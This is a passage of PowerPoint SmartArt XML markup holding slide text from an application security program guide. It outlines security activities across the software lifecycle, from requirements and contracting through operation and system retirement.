            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> to be</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> successful.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="3836842"/>
        <a:ext cx="5511838" cy="881998"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="3692202"/>
          <a:ext cx="938893" cy="1171277"/>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a:t>Integrate Security  into Existing Processes</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="3738035"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4334773" y="2727906"/>
          <a:ext cx="956146"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150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
            <a:t> Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
            <a:t> data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced,</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
            <a:t> vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
            <a:t> Analyze data from the implementation and verification activities to look for root cause and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
            <a:t> vulnerability patterns to drive strategic and systemic improvements across the enterprise. </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> Learn from mistakes and offer positive incentives to promote improvements.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033071" y="5076284"/>
        <a:ext cx="5512877" cy="862796"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="4922043"/>
          <a:ext cx="938893" cy="1171277"/>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a:t>Provide Management Visibility</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="4967876"/>
        <a:ext cx="847227" cy="10796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4483146" y="-2394526"/>
          <a:ext cx="708061"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46800" rIns="91440" bIns="46800" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" lvl="1" indent="-5760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Collect and negotiate the business requirements for an application with the business, including receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57600" lvl="1" indent="-5760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Compile the technical requirements including functional and non functional security requirements</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57600" lvl="1" indent="-5760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Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2057401" y="65784"/>
        <a:ext cx="5524987" cy="638931"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1069847" y="151"/>
          <a:ext cx="987553" cy="75119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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Require-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0" err="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>ments</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> and Resource Management</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1106517" y="36821"/>
        <a:ext cx="914213" cy="677852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4331330" y="-1373108"/>
          <a:ext cx="1011693"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600" lvl="1" indent="-57600" algn="l" defTabSz="400050" rtl="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Negotiate with internal or external developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices</a:t>
          </a:r>
        </a:p>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Rate the fulfillment of all technical requirements including a rough planning and design</a:t>
          </a:r>
        </a:p>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Negotiate all technical requirements including design, security and service level agreements (SLA)</a:t>
          </a:r>
        </a:p>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Consider to use templates and checklists, such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:br>
            <a:rPr lang="en-US" sz="300" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>NB:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Please note that the Annex is a sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2057401" y="950208"/>
        <a:ext cx="5510165" cy="912919"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1069847" y="1033873"/>
          <a:ext cx="987553" cy="75119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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Request for Proposals (RFP) and Contracting</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1106517" y="1070543"/>
        <a:ext cx="914213" cy="677852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4466883" y="-336583"/>
          <a:ext cx="738273"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600" lvl="1" indent="-57600" algn="l" defTabSz="400050" rtl="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Negotiate planning and design with the developers and internal shareholders, e.g. security specialists</a:t>
          </a:r>
        </a:p>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Define a security architecture, controls, and countermeasures according the protection needs and the planned environmental security level. This should be supported by security specialists.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Get the application owner to assume remaining risks or to provide additional resources.</a:t>
          </a:r>
        </a:p>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Each sprint, ensure security stories are created for functional requirements, and constraints added for non-functional requirements</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2056244" y="2110096"/>
        <a:ext cx="5523512" cy="666193"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1069847" y="2067595"/>
          <a:ext cx="986396" cy="75119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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Planning and </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Design</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1106517" y="2104265"/>
        <a:ext cx="913056" cy="677852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7532B555-E471-41D8-8A92-ECA00447B8E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4743092" y="323515"/>
          <a:ext cx="185853"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3600" tIns="123825" rIns="93600" bIns="123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>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Please review the +D "What's next for developers" for guidance</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2056243" y="3019438"/>
        <a:ext cx="5550479" cy="167707"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{46761723-0BDC-4B34-95D2-64CA865380D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1069847" y="2971067"/>
          <a:ext cx="986396" cy="264447"/>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90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Development</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1082756" y="2983976"/>
        <a:ext cx="960578" cy="238629"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4246967" y="1197070"/>
          <a:ext cx="1178104"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0000" tIns="123825" rIns="90000" bIns="123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" lvl="1" indent="-57600" algn="l" defTabSz="400050" rtl="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It's critical that security tasks automated the secure setup of the application, interfaces and of all further components needed, including required authorizations</a:t>
          </a:r>
        </a:p>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Test the technical functions and integration to the IT architecture, and coordinate business tests. Consider to test use and abuse cases from technical and business perspectives.</a:t>
          </a:r>
        </a:p>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Manage security tests according to internal processes, the protection needs and the level of security where the application is going to be deployed</a:t>
          </a:r>
        </a:p>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Put the application in operation and migrate from previously used applications</a:t>
          </a:r>
        </a:p>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Finalize all documentation, including the CMDB and security architecture</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2056243" y="3445304"/>
        <a:ext cx="5502042" cy="1063084"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1066789" y="3599300"/>
          <a:ext cx="986396" cy="75119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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Deployment, Testing and Rollout</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1103459" y="3635970"/>
        <a:ext cx="913056" cy="677852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4409029" y="2365392"/>
          <a:ext cx="853981"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3600" tIns="123825" rIns="93600" bIns="123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" lvl="1" indent="-57600" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Operating including the security management for the application (e.g. patch management)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" noProof="0" dirty="0">
            <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Regularly report all users and authorizations to the application owner and get them acknowledged</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Raise the security awareness of users and manage conflicts about usability vs security</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware and libraries</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Update all documentation, including in CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2056244" y="4759865"/>
        <a:ext cx="5517864" cy="770605"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm flipH="1">
          <a:off x="1069847" y="4769571"/>
          <a:ext cx="986396" cy="75119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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Operating and Changes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" baseline="0" noProof="0" dirty="0">
            <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1106517" y="4806241"/>
        <a:ext cx="913056" cy="677852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4588160" y="3320867"/>
          <a:ext cx="466948"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3600" tIns="123825" rIns="93600" bIns="123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" lvl="1" indent="-57600" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Implement business requirements for data retention (deletion) policies and securely archiving data</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57600" lvl="1" indent="-57600" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Securely close down the application, including deleting unused accounts and roles and permissions</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57600" lvl="1" indent="-57600" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Set your application’s state to retired in the CMDB</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2041859" y="5889964"/>
        <a:ext cx="5536757" cy="421358"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm flipH="1">
          <a:off x="1069847" y="5724437"/>
          <a:ext cx="972011" cy="752410"/>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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Retiring Systems</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1106577" y="5761167"/>
        <a:ext cx="898551" cy="67895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3170238" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106319" tIns="53159" rIns="106319" bIns="53159" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Datumsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143375" y="1"/>
